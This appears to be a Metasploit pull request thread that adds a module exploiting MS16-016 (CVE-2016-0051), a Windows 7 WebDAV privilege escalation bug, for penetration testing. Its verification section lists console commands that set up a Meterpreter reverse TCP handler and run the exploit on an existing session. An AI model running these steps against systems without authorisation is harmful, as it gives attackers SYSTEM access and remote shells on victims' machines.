Add ms16-016 local privilege escalation (originally #6695) #7075
Of course I forget the module docs ... or did I?
[ | ||
[ 'CVE', '2016-0051' ], | ||
[ 'MSB', 'MS16-016' ], | ||
[ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ] |
This isn't needed because it's already your first reference :-)
Hmmm it's not working for me:
Oh no, never mind. It is working. The firewall blocked it.
Release Notes
Add MS16-016 WebDAV null pointer dereference vulnerability - This module allows you to exploit a null pointer dereference vulnerability in Windows 7 SP1's WebDAV, and escalate your privilege to SYSTEM.
Nice work! Looks great.
Adds module which exploits MS16-016 (CVE-2016-0051). This was originally #6695 - I've had one dead SSD and a lot of drama in between now and then
@sinn3r @OJ tagged as original reviewers
Verification
List the steps needed to make sure this thing works
use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost your_ip_address
set lport whatever_port_you_configured_the_payload_with
run -j
background
use exploits/windows/local/ms16_016_webdav
set payload windows/meterpreter/reverse_tcp
set lhost your_ip_address
set lport whatever_port_you_configured_the_payload_with
set session whatever_your_meterpreter_session_number_is
run
You should see something like this: